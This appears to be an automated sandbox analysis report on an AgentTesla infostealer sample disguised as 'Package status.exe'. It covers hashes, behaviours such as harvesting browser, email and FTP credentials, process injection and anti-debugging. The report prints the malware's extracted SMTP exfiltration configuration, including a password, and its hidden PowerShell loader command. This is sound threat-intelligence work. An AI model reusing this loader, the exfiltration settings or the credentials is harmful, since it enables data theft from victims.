Analysis
-
max time kernel
139s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
19-06-2024 14:36
Static task
static1
Behavioral task
behavioral1
Sample
Package status.exe
Resource
win7-20240221-en
General
-
Target
Package status.exe
-
Size
810KB
-
MD5
f7f038db9cf8b30eedadbd0e1bd06475
-
SHA1
183a7e4912252c912340580478a756449d420c18
-
SHA256
1c4bde8818c2caac1ea5d08697561d52e4f977a31f648ef55fe54f13efe572e1
-
SHA512
43ce6cce5d06b7317b524689610b9154ffb2d7b16a55328321b19eb4baba9fb793f46e6d4e2ca582cfa5c5b7d7627e59cbd1860169efa31f4eadae3155322d1e
-
SSDEEP
12288:NX8AAopS5s7Prs1K9qjmF7UC5xkd56/iS3xwWaoSOs9BOvLcajeUoZe3xn7dhLO3:18N56/iS3Dao55LTue3xn7d3sCDPa7l
Malware Config
Extracted
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
vjru ncjq zilj zxwk
Extracted
agenttesla
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
vjru ncjq zilj zxwk - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 2 IoCs
Processes:
powershell.exeBiseksualiteten.exepid Process 2264 powershell.exe 2616 Biseksualiteten.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 api.ipify.org 7 api.ipify.org -
Drops file in System32 directory 1 IoCs
Processes:
Package status.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\kobberbrylluppers.dis Package status.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
Biseksualiteten.exepid Process 2616 Biseksualiteten.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeBiseksualiteten.exepid Process 2264 powershell.exe 2616 Biseksualiteten.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 2264 set thread context of 2616 2264 powershell.exe 32 -
Drops file in Windows directory 1 IoCs
Processes:
Package status.exedescription ioc Process File opened for modification C:\Windows\resources\0409\Protoplasmaet.ini Package status.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x00090000000122cd-19.dat nsis_installer_1 behavioral1/files/0x00090000000122cd-19.dat nsis_installer_2 -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exeBiseksualiteten.exepid Process 2264 powershell.exe 2264 powershell.exe 2264 powershell.exe 2264 powershell.exe 2264 powershell.exe 2264 powershell.exe 2264 powershell.exe 2264 powershell.exe 2616 Biseksualiteten.exe 2616 Biseksualiteten.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 2264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeBiseksualiteten.exedescription pid Process Token: SeDebugPrivilege 2264 powershell.exe Token: SeDebugPrivilege 2616 Biseksualiteten.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
Package status.exepowershell.exedescription pid Process procid_target PID 2156 wrote to memory of 2264 2156 Package status.exe 28 PID 2156 wrote to memory of 2264 2156 Package status.exe 28 PID 2156 wrote to memory of 2264 2156 Package status.exe 28 PID 2156 wrote to memory of 2264 2156 Package status.exe 28 PID 2264 wrote to memory of 2988 2264 powershell.exe 30 PID 2264 wrote to memory of 2988 2264 powershell.exe 30 PID 2264 wrote to memory of 2988 2264 powershell.exe 30 PID 2264 wrote to memory of 2988 2264 powershell.exe 30 PID 2264 wrote to memory of 2616 2264 powershell.exe 32 PID 2264 wrote to memory of 2616 2264 powershell.exe 32 PID 2264 wrote to memory of 2616 2264 powershell.exe 32 PID 2264 wrote to memory of 2616 2264 powershell.exe 32 PID 2264 wrote to memory of 2616 2264 powershell.exe 32 PID 2264 wrote to memory of 2616 2264 powershell.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\Package status.exe"C:\Users\Admin\AppData\Local\Temp\Package status.exe"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$corabecan=Get-Content 'C:\Users\Admin\AppData\Local\gannetry\Hjelmkldtes\Antesunrise.Ski';$kitningers=$corabecan.SubString(12628,3);.$kitningers($corabecan)"2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\Biseksualiteten.exe"C:\Users\Admin\AppData\Local\Temp\Biseksualiteten.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
69KB
MD595c71503bc640705b0973b75d1249e2b
SHA144a3114402114ed571c9920eebf2a2c938c7e9c3
SHA2569c8314a2876644dff91652aefd829835e8700d7cd00d4a2f24173c29f9532dae
SHA5124512060a616f79bfaa62c3837a2ae68f798f1bb54d63e037b432b79a720fba3fb0c9b48409f22473ff63a7a21a37eb6e119f9eaa05521d40b7bfb771b66e4808
-
Filesize
314KB
MD521282b210d55b15aa4083674e5b769eb
SHA1425367906b18c625a6d6182c42ed67ece27b5262
SHA256410339e0545e9ee17cf941a8f41b371917495b0811b0b4796c259710a83671c2
SHA512c6dae5cb93db9ec7b7f125c38e0a95887c9a3e9344d7da046162f08184e9bedae80fe18c6aea2dd98c36b6cd27726d189d341426fbda0ce3f05c58a09cd7e67e
-
Filesize
810KB
MD5f7f038db9cf8b30eedadbd0e1bd06475
SHA1183a7e4912252c912340580478a756449d420c18
SHA2561c4bde8818c2caac1ea5d08697561d52e4f977a31f648ef55fe54f13efe572e1
SHA51243ce6cce5d06b7317b524689610b9154ffb2d7b16a55328321b19eb4baba9fb793f46e6d4e2ca582cfa5c5b7d7627e59cbd1860169efa31f4eadae3155322d1e